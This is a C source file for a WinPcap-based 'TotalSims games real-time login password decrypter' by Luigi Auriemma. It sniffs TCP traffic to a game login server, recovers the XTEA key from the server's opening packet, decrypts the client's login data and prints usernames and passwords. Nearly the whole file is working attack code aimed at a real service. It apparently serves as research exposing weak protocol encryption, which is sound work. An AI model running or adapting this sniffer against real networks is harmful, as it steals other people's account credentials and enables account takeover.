/*

    Copyright 2004,2005,2006 Luigi Auriemma

    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307 USA

    http://www.gnu.org/licenses/gpl.txt

Windows Winpcap version
*/

#include <stdio.h>
#include <stdlib.h>
#include <pcap.h>
#include <string.h>
#include <winsock.h>
#include <math.h>
#include "totalsims_xtea.h"
#include "ether_hdrlen.h"
#include "show_dump.h"



#define VER         "0.1"
#define SERVER      "arnalist.warbirdsiii.com"
#define PORT        19243



void dispatcher_handler(u_char *temp1, const struct pcap_pkthdr *header, const u_char *pkt_data);
u_int resolv(char *host);



struct iphdr {
    u_int   ihl:4;
    u_int   version:4;
    u_char  tos;
    u_short tot_len;
    u_short id;
    u_short frag_off;
    u_char  ttl;
    u_char  protocol;
    u_short check;
    u_int   saddr;
    u_int   daddr;
} *iphdr;

struct tcphdr {
    u_short source;
    u_short dest;
    u_int   seq;
    u_int   ack_seq;
    u_short res1:4;
    u_short doff:4;
    u_short fin:1;
    u_short syn:1;
    u_short rst:1;
    u_short psh:1;
    u_short ack:1;
    u_short urg:1;
    u_short res2:2;
    u_short window;
    u_short check;
    u_short urg_ptr;
} *tcphdr;

u_int      server,
            key;
u_short     port;
int         counter;



int main(int argc, char *argv[]) {
    char        errbuf[PCAP_ERRBUF_SIZE];
    pcap_t      *fp;
    int         i,
                inum;
    pcap_if_t   *alldevs,
                *d;


    setbuf(stdout, NULL);

    fprintf(stderr, "\n"
        "TotalSims games real-time login password decrypter "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n"
        "Usage: %s [server] [port]\n"
        "\n"
        " You can specify the server and the port to sniff simply adding the server's\n"
        " hostname and (optionally) its port at command-line\n"
        " By default server is \"%s\" and port is %d\n"
        "\n", argv[0], SERVER, PORT);

    if(pcap_findalldevs(&alldevs, errbuf) < 0) {
        fprintf(stderr,"Error in pcap_findalldevs: %s\n", errbuf);
        exit(1);
    }

    fprintf(stderr, "Interfaces list:\n\n");
    for(i = 0, d = alldevs; d; d = d->next) {
        fprintf(stderr, "%d. %s", ++i, d->name);
        if(d->description) fprintf(stderr, " (%s)\n", d->description);
            else fprintf(stderr, " (No description available)\n");
    }

    if(!i) {
        fprintf(stderr, "\nNo interfaces found! Make sure WinPcap is installed.\n");
        pcap_freealldevs(alldevs);
        exit(1);
    } else if(i > 1) {
        fprintf(stderr, "\nEnter the interface number (1 - %d): ",i);
        scanf("%d", &inum);

        if(inum < 1 || inum > i) {
            fprintf(stderr, "\nInterface number out of range.\n");
            pcap_freealldevs(alldevs);
            exit(1);
        }
    } else inum = 1;

    for(inum--, d = alldevs, i = 0; i < inum; d = d->next, i++);
    fprintf(stderr, "\nAdapter used: %s\n\n", d->name);

    fp = pcap_open_live(d->name, 65535, 1, 1000, errbuf);
    if(!fp) {
        printf("\nError: %s\n", errbuf);
        pcap_freealldevs(alldevs);
        exit(1);
    }

    pcap_freealldevs(alldevs);

    fputs("- resolv hostname...\n", stdout);
    if(argc > 1) server = resolv(argv[1]);
        else server = resolv(SERVER);
    if(argc > 2) port = htons(atoi(argv[2]));
        else port = htons(PORT);

    printf("- start sniffing and decoding of login data sent to %s:%hu\n",
        inet_ntoa(*(struct in_addr *)&server), ntohs(port));

    counter = 2;    // counter is initialized with SYN packet

    pcap_loop(fp, 0, dispatcher_handler, NULL);

    return(0);
}



void dispatcher_handler(u_char *temp1, const struct pcap_pkthdr *header, const u_char *pkt_data) {
    struct  iphdr   *ip;
    struct  tcphdr  *tcp;
    u_char  *data;
    int     len,
            off;

    off = 14 + ether_hdrlen(ntohs(*(u_short *)(pkt_data + 12)));

    ip   = (struct iphdr *)(pkt_data + off);
    tcp  = (struct tcphdr *)((u_char *)ip + sizeof(struct iphdr));
    data = (u_char *)((u_char *)tcp + sizeof(struct tcphdr));

    if(ip->protocol != IPPROTO_TCP) return;

    if((ip->saddr != server) && (ip->daddr != server)) return;

    if((tcp->source != port) && (tcp->dest != port)) return;

    if((tcp->fin) || (tcp->syn)) counter = 0;
    if(!tcp->psh) return;

    len = header->len -             // full packet length
          off -                     // Ethernet offset
          sizeof(struct iphdr) -    // IP
          sizeof(struct tcphdr);    // TCP
    if(len <= 0) return;

    if(!counter) {
        if(ip->daddr == server) return; // need server
        if(len != 32) {
            printf("\nError: sniffed a partial TCP data (%d) so I cannot manage it\n", len);
            counter = 2;
        }
        key = totalsims_getkey(data);
        counter = 1;

    } else if(counter == 1) {
        if(ip->saddr == server) return; // need client
        if(len == 2) return;            // skip 01 00
        totalsims_xtea_dec(data, len, key);
        if(len != 96) {
            fputs("\nAlert: uncommon TCP data, I have decoded it but check this dump:\n", stdout);
            show_dump(data, len, stdout);
            counter++;
            return;
        }
        printf("\n  Username:   %s\n", data);
        printf("  Password:   %s\n", data + 32);
        printf("  Dummy?:     %s\n", data + 64);
        counter++;
    }
}



u_int resolv(char *host) {

WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);

    struct  hostent *hp;
    u_int  host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolve hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_int *)hp->h_addr;
    }
    return(host_ip);
}



